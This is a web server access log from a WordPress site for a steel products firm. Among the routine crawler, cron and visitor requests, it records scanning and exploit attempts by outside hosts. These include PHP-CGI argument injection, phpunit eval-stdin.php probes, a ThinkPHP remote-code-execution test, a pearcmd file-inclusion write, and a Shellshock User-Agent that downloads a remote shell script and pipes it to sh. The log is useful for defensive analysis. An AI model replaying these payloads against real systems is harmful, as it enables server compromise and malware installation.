112.124.56.43 - - [18/Jan/2026:02:16:10 +0800] "POST /sdk HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
112.124.56.43 - - [18/Jan/2026:02:16:11 +0800] "GET /evox/about HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
112.124.56.43 - - [18/Jan/2026:02:16:11 +0800] "GET /HNAP1 HTTP/1.1" 404 31367 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
112.124.56.43 - - [18/Jan/2026:02:16:30 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
112.124.56.43 - - [18/Jan/2026:02:16:31 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [18/Jan/2026:02:18:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768673903.6403930187225341796875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
40.77.167.75 - - [18/Jan/2026:02:18:23 +0800] "GET /?s=2025 HTTP/1.1" 200 19861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
43.130.9.111 - - [18/Jan/2026:02:18:37 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 17678 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:02:24:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768674274.1578640937805175781250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.70.46.38 - - [18/Jan/2026:02:24:34 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
193.70.46.38 - - [18/Jan/2026:02:24:37 +0800] "GET /portfolio-tag/%E9%9E%8D%E9%92%A2%E8%92%82%E6%A3%AE/ HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
193.70.46.38 - - [18/Jan/2026:02:24:40 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22030 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
193.70.46.38 - - [18/Jan/2026:02:24:45 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 18888 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [18/Jan/2026:02:26:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768674407.8008520603179931640625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.148.247 - - [18/Jan/2026:02:26:48 +0800] "GET / HTTP/1.1" 200 157416 "-" "-"
36.133.115.36 - - [18/Jan/2026:02:28:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768674535.9963979721069335937500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
222.89.169.98 - - [18/Jan/2026:02:28:56 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31367 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:28:57 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 157416 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:28:57 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:28:58 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:28:59 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:28:59 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:00 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:00 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:00 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:01 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:01 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:02 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:02 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:03 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:03 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:04 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:04 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:05 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:05 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:06 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:06 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:07 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:07 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:08 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:09 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:09 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:10 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:10 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:11 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:11 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:12 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:12 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:13 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:13 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:13 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:14 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:14 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:15 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:16 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:17 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65632 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:17 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:19 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 157416 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:20 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 157416 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:21 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
222.89.169.98 - - [18/Jan/2026:02:29:23 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [18/Jan/2026:02:34:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768674865.2324070930480957031250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [18/Jan/2026:02:34:25 +0800] "POST / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [18/Jan/2026:02:46:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768675589.4941129684448242187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.159.128.155 - - [18/Jan/2026:02:46:29 +0800] "GET /bug HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.128.155 - - [18/Jan/2026:02:46:33 +0800] "GET /bug/ HTTP/1.1" 200 11698 "http://cqqizhou.com/bug" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:02:47:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768675650.6343600749969482421875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
38.46.221.123 - - [18/Jan/2026:02:47:30 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [18/Jan/2026:02:47:32 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 40643 "http://check.9tb.org" "Go-http-client/1.1"
36.133.115.36 - - [18/Jan/2026:02:47:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768675672.9902110099792480468750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
93.174.93.12 - - [18/Jan/2026:02:47:53 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70"
36.133.115.36 - - [18/Jan/2026:02:52:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768675967.3822050094604492187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1768526227" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:47 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:49 +0800] "GET /wp-content/uploads/2025/12/1765268955-qizhou_Slider1_3840%C3%972160_20251210-scaled.webp HTTP/1.1" 200 152162 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:49 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:49 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled-50x100.webp HTTP/1.1" 200 976 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:50 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2000 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:50 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:50 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=4 HTTP/1.1" 200 2580 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:50 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled.webp HTTP/1.1" 200 131696 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
118.113.189.49 - - [18/Jan/2026:02:52:50 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:02:55:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768676131.8805220127105712890625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.128.67.187 - - [18/Jan/2026:02:55:31 +0800] "GET /2388/ HTTP/1.1" 200 20358 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:03:01:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768676499.0322539806365966796875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.219 - - [18/Jan/2026:03:01:39 +0800] "GET / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.222.108.115 - - [18/Jan/2026:03:01:45 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [18/Jan/2026:03:09:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768676983.7873649597167968750000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.166.226.186 - - [18/Jan/2026:03:09:43 +0800] "GET /2361/ HTTP/1.1" 200 20828 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:03:16:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768677388.9868528842926025390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.149.159 - - [18/Jan/2026:03:16:29 +0800] "GET / HTTP/1.1" 200 157416 "-" "-"
36.133.115.36 - - [18/Jan/2026:03:17:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768677425.8998889923095703125000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
170.106.15.3 - - [18/Jan/2026:03:17:05 +0800] "GET /club/ HTTP/1.1" 200 11913 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:03:26:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768677961.5025761127471923828125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.46 - - [18/Jan/2026:03:26:01 +0800] "GET /index HTTP/1.1" 404 8951 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
43.157.38.228 - - [18/Jan/2026:03:26:07 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fbug%2F HTTP/1.1" 200 1139 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
222.75.122.66 - - [18/Jan/2026:03:33:44 +0800] "GET / HTTP/1.1" 200 40643 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
43.157.168.43 - - [18/Jan/2026:03:36:07 +0800] "GET /wp-content/uploads/2025/12/1766647831-Article_images_202512254-300x169.webp HTTP/1.1" 200 14354 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.3.35.191 - - [18/Jan/2026:03:37:26 +0800] "GET /contacts/ HTTP/1.1" 200 18807 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5; rv:114.0) Gecko/20100101 Firefox/114.0"
36.133.115.36 - - [18/Jan/2026:03:37:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768678649.6948490142822265625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
104.207.58.250 - - [18/Jan/2026:03:37:29 +0800] "POST /wp-json/contact-form-7/v1/contact-forms/158/feedback HTTP/1.1" 200 218 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5; rv:114.0) Gecko/20100101 Firefox/114.0"
36.133.115.36 - - [18/Jan/2026:03:40:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768678801.1215219497680664062500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
79.124.40.174 - - [18/Jan/2026:03:40:01 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:03:42:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768678922.9327170848846435546875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
95.214.55.246 - - [18/Jan/2026:03:42:03 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0"
36.133.115.36 - - [18/Jan/2026:03:43:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768678982.4347689151763916015625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
92.240.63.108 - - [18/Jan/2026:03:43:03 +0800] "GET / HTTP/1.1" 200 157416 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
36.133.115.36 - - [18/Jan/2026:03:44:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768679046.2276790142059326171875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
115.159.33.43 - - [18/Jan/2026:03:44:06 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
185.208.206.98 - - [18/Jan/2026:03:44:26 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.208.206.98 - - [18/Jan/2026:03:44:27 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22030 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
43.157.53.115 - - [18/Jan/2026:03:46:41 +0800] "GET /wp-content/uploads/2025/12/1766647830-Article_images_202512252-768x432.webp HTTP/1.1" 200 79854 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:03:47:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768679258.6753869056701660156250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
193.142.147.209 - - [18/Jan/2026:03:47:39 +0800] "POST / HTTP/1.1" 200 34745 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [18/Jan/2026:03:52:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768679558.8429329395294189453125 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
48.214.144.160 - - [18/Jan/2026:03:52:38 +0800] "GET /manager/html HTTP/1.1" 404 8951 "-" "Mozilla/5.0 zgrab/0.x"
192.159.99.95 - - [18/Jan/2026:03:53:29 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 499 0 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [18/Jan/2026:03:53:30 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io"
36.133.115.36 - - [18/Jan/2026:03:53:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768679610.9077820777893066406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [18/Jan/2026:03:55:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768679740.9601080417633056640625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
34.34.132.221 - - [18/Jan/2026:03:55:40 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
43.157.142.101 - - [18/Jan/2026:03:56:04 +0800] "GET /wp-content/uploads/2025/12/1766064629-Article_images_20251218212623.webp HTTP/1.1" 200 20366 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [18/Jan/2026:03:56:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768679768.7399659156799316406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
14.215.163.132 - - [18/Jan/2026:03:56:08 +0800] "GET / HTTP/1.1" 200 34742 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
